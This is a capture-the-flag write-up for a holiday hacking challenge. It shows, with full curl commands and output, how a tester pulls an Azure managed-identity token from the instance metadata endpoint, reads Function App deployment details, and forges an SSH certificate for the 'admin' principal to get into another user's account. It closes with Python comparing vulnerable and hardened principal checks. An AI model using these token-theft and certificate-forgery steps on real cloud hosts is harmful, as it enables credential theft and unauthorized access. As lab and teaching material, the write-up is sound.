# Certificate SSHenanigans

## Objective

<details>

<summary>Conversation with Alabaster Snowball</summary>

Hello there! Alabaster Snowball at your service.

I could use your help with my fancy new Azure server at **ssh-server-vm.santaworkshopgeeseislands.org**.

ChatNPT suggested I upgrade the host to use SSH certificates, such a great idea!

It even generated ready-to-deploy code for an [Azure Function App](https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl) so elves can request their own certificates. What a timesaver!

I'm a little wary though. I'd appreciate it if you could take a peek and confirm everything's secure before I deploy this configuration to all the Geese Islands servers.

Generate yourself a certificate and use the *monitor* account to access the host. See if you can grab my TODO list.

If you haven't heard of SSH certificates, Thomas Bouve gave an introductory talk and demo on that topic recently.

Oh, and if you need to peek at the Function App code, there's a handy [Azure REST API endpoint](https://learn.microsoft.com/en-us/rest/api/appservice/web-apps/get-source-control) which will give you details about how the Function App is deployed.

</details>

## Solution

First, we look at what the Azure web app provides. It appears to generate an SSH certificate for specific principals.

<figure><img src="/files/cXyK8NfZTC4THUngR2fD" alt=""><figcaption><p>SSH certificate site</p></figcaption></figure>

We can save this certificate as `id_rsa-cert.pub` and use it to authenticate to the server as the user `monitor`.

<figure><img src="/files/raakUMiPWndSEjKcAecL" alt=""><figcaption><p>SatTracker</p></figcaption></figure>

We can exit the running SatTracker with Ctrl+C.

From here, we can use the Azure REST API to enumerate the environment and try to gain access to the app's source code.

First, we query the instance metadata endpoint. This gives us the resource group, subscription ID, and more.

<figure><img src="/files/30sDjqcWC6EdJDb4VA8x" alt=""><figcaption><p>Endpoint 1</p></figcaption></figure>

<details>

<summary>Endpoint 1 command &#x26; output</summary>

```
monitor@ssh-server-vm:~$ curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
{
  "compute": {
    "azEnvironment": "AzurePublicCloud",
    "customData": "",
    "evictionPolicy": "",
    "isHostCompatibilityLayerVm": "false",
    "licenseType": "",
    "location": "eastus",
    "name": "ssh-server-vm",
    "offer": "",
    "osProfile": {
      "adminUsername": "",
      "computerName": "",
      "disablePasswordAuthentication": ""
    },
    "osType": "Linux",
    "placementGroupId": "",
    "plan": {
      "name": "",
      "product": "",
      "publisher": ""
    },
    "platformFaultDomain": "0",
    "platformUpdateDomain": "0",
    "priority": "",
    "provider": "Microsoft.Compute",
    "publicKeys": [],
    "publisher": "",
    "resourceGroupName": "northpole-rg1",
    "resourceId": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/virtualMachines/ssh-server-vm",
    "securityProfile": {
      "secureBootEnabled": "false",
      "virtualTpmEnabled": "false"
    },
    "sku": "",
    "storageProfile": {
      "dataDisks": [],
      "imageReference": {
        "id": "",
        "offer": "",
        "publisher": "",
        "sku": "",
        "version": ""
      },
      "osDisk": {
        "caching": "ReadWrite",
        "createOption": "Attach",
        "diffDiskSettings": {
          "option": ""
        },
        "diskSizeGB": "30",
        "encryptionSettings": {
          "enabled": "false"
        },
        "image": {
          "uri": ""
        },
        "managedDisk": {
          "id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/disks/ssh-server-vm_os_disk",
          "storageAccountType": "Standard_LRS"
        },
        "name": "ssh-server-vm_os_disk",
        "osType": "Linux",
        "vhd": {
          "uri": ""
        },
        "writeAcceleratorEnabled": "false"
      },
      "resourceDisk": {
        "size": "63488"
      }
    },
    "subscriptionId": "2b0942f3-9bca-484b-a508-abdae2db5e64",
    "tags": "Project:HHC23",
    "tagsList": [
      {
        "name": "Project",
        "value": "HHC23"
      }
    ],
    "userData": "",
    "version": "",
    "vmId": "1f943876-80c5-4fc2-9a77-9011b0096c78",
    "vmScaleSetName": "",
    "vmSize": "Standard_B4ms",
    "zone": ""
  },
  "network": {
    "interface": [
      {
        "ipv4": {
          "ipAddress": [
            {
              "privateIpAddress": "10.0.0.50",
              "publicIpAddress": ""
            }
          ],
          "subnet": [
            {
              "address": "10.0.0.0",
              "prefix": "24"
            }
          ]
        },
        "ipv6": {
          "ipAddress": []
        },
        "macAddress": "6045BDFE2D67"
      }
    ]
  }
}

```

</details>

Next, we get an authorization token from the OAuth endpoint.

<figure><img src="/files/6GDta06YuCohZyzFGhOq" alt=""><figcaption><p>Endpoint 2</p></figcaption></figure>

<details>

<summary>Endpoint 2 command &#x26; output</summary>

```
monitor@ssh-server-vm:~$ curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.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.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw","client_id":"b84e06d3-aba1-4bcc-9626-2e0d76cba2ce","expires_in":"86285","expires_on":"1704341254","ext_expires_in":"86399","not_before":"1704254554","resource":"https://management.azure.com/","token_type":"Bearer"}
```

</details>

<figure><img src="/files/ATcbJ6qm9BoLBLUBaR4b" alt=""><figcaption><p>Endpoint 3 </p></figcaption></figure>

<details>

<summary>Endpoint 3 command &#x26; output</summary>

```
monitor@ssh-server-vm:~$ curl -X GET https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web?api-version=2022-03-01 -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.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.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw"
{"id":"/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web","name":"northpole-ssh-certs-fa","type":"Microsoft.Web/sites/sourcecontrols","location":"East US","tags":{"project":"northpole-ssh-certs","create-cert-func-url-path":"/api/create-cert?code=candy-cane-twirl"},"properties":{"repoUrl":"https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa","branch":"main","isManualIntegration":false,"isGitHubAction":true,"deploymentRollbackEnabled":false,"isMercurial":false,"provisioningState":"Succeeded","gitHubActionConfiguration":{"codeConfiguration":null,"containerConfiguration":null,"isLinux":true,"generateWorkflowFile":true,"workflowSettings":{"appType":"functionapp","publishType":"code","os":"linux","variables":{"runtimeVersion":"3.11"},"runtimeStack":"python","workflowApiVersion":"2020-12-01","useCanaryFusionServer":false,"authType":"publishprofile"}}}}
```

</details>

In this endpoint, we find a GitHub repository with the source code: <https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa>

When we look at the source code, we see that the application actually allows us to set a value for the "principal".

<figure><img src="/files/ljcWGAQBw4kUtmw8HxSD" alt=""><figcaption></figcaption></figure>

In this situation, we can seemingly request SSH certificates for other users or "principals". So we try a default principal, "admin", and when we send the request we get an SSH certificate back, which the server accepts for the `alabaster` account:

<figure><img src="/files/4nEcHSfItzPJiImaOsLp" alt=""><figcaption><p>Access as Alabaster</p></figcaption></figure>

<details>

<summary>Principal Input, SSH Connection, To-Do List</summary>

```
┌──(stitch㉿snore)-[~]
└─$ curl -X POST https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl -H "Content-Type: application/json" --data '{"ssh_pub_key":"ssh-rsa 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","principal":"admin"}'
{"ssh_cert": "rsa-sha2-512-cert-v01@openssh.com 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 ", "principal": "admin"}                                                                                                                                                                       
┌──(stitch㉿snore)-[~]
└─$ cp id_rsa-cert.pub .ssh                                  
                                                                                                                                                                       
┌──(stitch㉿snore)-[~]
└─$ ssh alabaster@ssh-server-vm.santaworkshopgeeseislands.org
alabaster@ssh-server-vm:~$ ls
alabaster_todo.md  impacket
alabaster@ssh-server-vm:~$ cat alabaster_todo.md 
# Geese Islands IT & Security Todo List

- [X] Sleigh GPS Upgrade: Integrate the new "Island Hopper" module into Santa's sleigh GPS. Ensure Rudolph's red nose doesn't interfere with the signal.
- [X] Reindeer Wi-Fi Antlers: Test out the new Wi-Fi boosting antler extensions on Dasher and Dancer. Perfect for those beach-side internet browsing sessions.
- [ ] Palm Tree Server Cooling: Make use of the island's natural shade. Relocate servers under palm trees for optimal cooling. Remember to watch out for falling coconuts!
- [ ] Eggnog Firewall: Upgrade the North Pole's firewall to the new EggnogOS version. Ensure it blocks any Grinch-related cyber threats effectively.
- [ ] Gingerbread Cookie Cache: Implement a gingerbread cookie caching mechanism to speed up data retrieval times. Don't let Santa eat the cache!
- [ ] Toy Workshop VPN: Establish a secure VPN tunnel back to the main toy workshop so the elves can securely access to the toy blueprints.
- [ ] Festive 2FA: Roll out the new two-factor authentication system where the second factor is singing a Christmas carol. Jingle Bells is said to be the most secure.

```

</details>

During this, we found that the application written by ChatNPT was not secure: it allowed us to request SSH certificates as other users on the machine.
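
The flaw described above next to one way to close it, as an added example (not the Function App's actual code): the vulnerable function takes the principal from the request body, while the hardened one authorizes it against an authenticated caller. The caller names, the policy table and the `elf` default principal are assumptions made for illustration; the shared `code=` key in the URL identifies no individual caller, so the caller identity has to come from real authentication.

```python
import json

# Hypothetical policy: which principals each authenticated caller may hold.
# Names are constructed for this example; a real deployment would read them
# from its identity provider, never from the request body.
CALLER_PRINCIPALS = {"elf-user": {"elf"}, "alabaster": {"elf", "admin"}}
DEFAULT_PRINCIPAL = "elf"
ALLOWED_FIELDS = {"ssh_pub_key", "principal"}


def pick_principal_vulnerable(body: str) -> str:
    """The flaw the write-up describes: the caller names its own principal."""
    data = json.loads(body)
    return data.get("principal", DEFAULT_PRINCIPAL)


def pick_principal_hardened(body: str, caller: str) -> str:
    """Authorize the requested principal against the authenticated caller."""
    data = json.loads(body)
    # Strict schema: reject anything that is not an object of known fields.
    if not isinstance(data, dict) or set(data) - ALLOWED_FIELDS:
        raise ValueError("unexpected request shape")
    granted = CALLER_PRINCIPALS.get(caller, set())
    requested = data.get("principal", DEFAULT_PRINCIPAL)
    if not isinstance(requested, str) or requested not in granted:
        # Denials are worth logging: they show someone probing principals.
        raise PermissionError(f"{caller!r} may not request {requested!r}")
    return requested


# Constructed request shaped like the one in the write-up (key is a dummy).
FORGED = json.dumps({"ssh_pub_key": "ssh-rsa constructed-key", "principal": "admin"})

if __name__ == "__main__":
    print("vulnerable signs for:", pick_principal_vulnerable(FORGED))
    try:
        pick_principal_hardened(FORGED, "elf-user")
    except PermissionError as err:
        print("hardened refuses:", err)
```
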


